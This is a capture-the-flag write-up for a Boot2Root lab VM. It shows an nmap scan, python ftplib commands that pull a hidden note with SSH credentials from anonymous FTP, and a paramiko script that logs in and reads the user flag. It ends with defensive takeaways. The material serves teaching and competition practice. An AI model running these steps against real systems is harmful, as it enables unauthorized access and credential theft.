N
Back to writeup archive
Hack@10 International Capture The Flag Pre-Eliminary Round 2026

Library-V2 - user

Anonymous FTP to SSH workflow for the Library-V2 user flag.

Boot2RootMarkdown + PDFUsersolved2 minreadยท418words
route
/TryN3rr0r/writeups/hack10-pre-eliminary-2026/library-v2-user
archive index
12 / 15
read mode
parsed markdown
Writeup loaded.

Library-V2 - user

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.252.137
category
Boot2Root
points
486
difficulty
Easy
flag format
hack10{...}
tools used
nmappython3ftplibparamikobase64
final flag
hack10{4n0nym0u5_ftp_t0_55h_w00t}
reveal and copy from section 5

๐Ÿ† Challenge Objective

The objective of this challenge is to enumerate the provided Virtual Machine target (192.168.252.137), gain initial user access, and capture the user flag.

<br>

๐Ÿ“ Methodology

#### 1. Challenge Overview

The challenge provides a live VM with several standard services open, including anonymous FTP, SSH, HTTP and MySQL. Our goal is to find an initial entry point to retrieve the user-level flag on the system without bypassing the intended Boot2Root process.

#### 2. Initial Reconnaissance

We started with a provided detailed nmap scan which highlighted open ports and services:

Port 21 (FTP): vsftpd 3.0.5 โ€” Allowed Anonymous FTP login, exposing a public directory.

Port 22 (SSH): OpenSSH 8.9p1 Ubuntu

Port 80 (HTTP): Apache 2.4.52

Port 3306 (MySQL): Unauthorized

Port 8080 (HTTP): nginx 1.18.0

The Nmap scan output:

bash38 lines
1$ sudo nmap -sC -sV -T4 192.168.252.1372Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-27 17:08 -04003Nmap scan report for 192.168.252.1374Host is up (0.0010s latency).5Not shown: 995 closed tcp ports (reset)6PORT     STATE SERVICE VERSION721/tcp   open  ftp     vsftpd 3.0.58| ftp-syst: 9|   STAT: 10| FTP server status:11|      Connected to 192.168.252.13212|      Logged in as ftp13|      TYPE: ASCII14|      No session bandwidth limit15|      Session timeout in seconds is 30016|      Control connection is plain text17|      Data connections will be plain text18|      At session startup, client count was 119|      vsFTPd 3.0.5 - secure, fast, stable20|_End of status21| ftp-anon: Anonymous FTP login allowed (FTP code 230)22|_drwxr-xr-x    1 106      109          4096 Mar 27 16:10 public2322/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.14 (Ubuntu Linux; protocol 2.0)24| ssh-hostkey: 25|   256 b1:a9:da:c3:dd:c7:70:41:33:99:0d:0e:ea:bd:a3:a7 (ECDSA)26|_  256 14:c7:12:32:8c:03:2d:07:01:52:b5:a0:aa:91:a3:63 (ED25519)2780/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))28|_http-title: Site doesn't have a title (text/html).29|_http-server-header: Apache/2.4.52 (Ubuntu)303306/tcp open  mysql   MySQL (unauthorized)318080/tcp open  http    nginx 1.18.0 (Ubuntu)32|_http-server-header: nginx/1.18.0 (Ubuntu)33|_http-title: Site doesn't have a title (text/html).34|_http-open-proxy: Proxy might be redirecting requests35MAC Address: 00:0C:29:BB:79:8C (VMware)36Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel37Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .38Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
PDF evidence frame 01

#### 3. Analysis / Forensics Path

Finding that anonymous FTP was enabled, we scripted a quick FTP connection to interact with the target and browse the inner directories.

Examining the root and the public directory, we found a hidden file named .secret_note.txt.

Fetching it confirmed a message pointing directly to valid credentials:

bash6 lines
1$ python3 -c "import ftplib; f = ftplib.FTP('192.168.252.137'); f.login('anonymous', 'anonymous'); f.cwd('public'); print('Public:', f.nlst('-a'))"2Public: ['.', '..', '.secret_note.txt']3$ python3 -c "import ftplib; f = ftplib.FTP('192.168.252.137'); f.login('anonymous', 'anonymous'); f.cwd('public'); f.retrbinary('RETR .secret_note.txt', open('.secret_note.txt', 'wb').write)" \&\& cat .secret_note.txt4To the new librarian:5Please use the password 'Shhh!KeepQuiet' for your local SSH account.6- Admin

This gave us the username librarian and the password Shhh!KeepQuiet.

PDF evidence frame 02

#### 4. Exploitation / Recovery

Using the discovered credentials, we established an SSH connection to log into the victim machine. We deployed a Paramiko Python script to bypass bash history expansion issues with the exclamation mark (!) in the password string.

python6 lines
1import paramiko2client = paramiko.SSHClient()3client.set_missing_host_key_policy(paramiko.AutoAddPolicy())4client.connect('192.168.252.137', username='librarian', password='Shhh!KeepQuiet')5stdin, stdout, stderr = client.exec_command('id; whoami; ls -la; cat user.txt')6print(stdout.read().decode())

Running the script resulted in local user enumeration and retrieval of user.txt:

bash13 lines
1$ python3 ssh_test.py2uid=1000(librarian) gid=1000(librarian) groups=1000(librarian)3librarian4total 365drwxr-x--- 1 librarian librarian 4096 Mar 27 21:12 .6drwxr-xr-x 1 root      root      4096 Mar 27 16:10 ..7-rw-r--r-- 1 librarian librarian  220 Jan  6  2022 .bash_logout8-rw-r--r-- 1 librarian librarian 3771 Jan  6  2022 .bashrc9drwx------ 2 librarian librarian 4096 Mar 27 21:12 .cache10-rw-r--r-- 1 librarian librarian  807 Jan  6  2022 .profile11drwxr-xr-x 2 librarian librarian 4096 Mar 27 16:10 books12-rw------- 1 librarian librarian   49 Mar 27 16:10 user.txt13aGFjazEwezRuMG55bTB1NV9mdHBfdDBfNTVoX3cwMHR9Cg==

The flag inside user.txt was Base64 encoded. Decoding it revealed the genuine plaintext flag:

bash3 lines
1$ echo "aGFjazEwezRuMG55bTB1NV9mdHBfdDBfNTVoX3cwMHR9Cg==" | base64 -d23hack10{4n0nym0u5_ftp_t0_55h_w00t}
PDF evidence frame 03

#### 5. Flag

captured flag
hack10{4n0nym0u5_ftp_t0_55h_w00t}

#### 6. Summary of Approach \& Key Takeaways

Methodology: We utilized standard enumeration to identify an anonymous FTP instance. Within the FTP directories, we located a hidden .secret_note.txt file which hardcoded the default credentials for the local librarian user. Logging into SSH allowed us to locate the Base64-encoded user.txt flag and decode it.

Key Takeaways:

Leaving Anonymous login enabled on an FTP server is extremely dangerous if directories containing sensitive configurations, passwords, or backups are not strictly separated and properly permission-restricted.

Hardcoded internal credentials (passwords left in easily accessible text files out of convenience) remains one of the most prominent Initial Access vectors.

Always remember to check for hidden files (-a arguments in directory listings) during initial data recon.

PDF evidence frame 04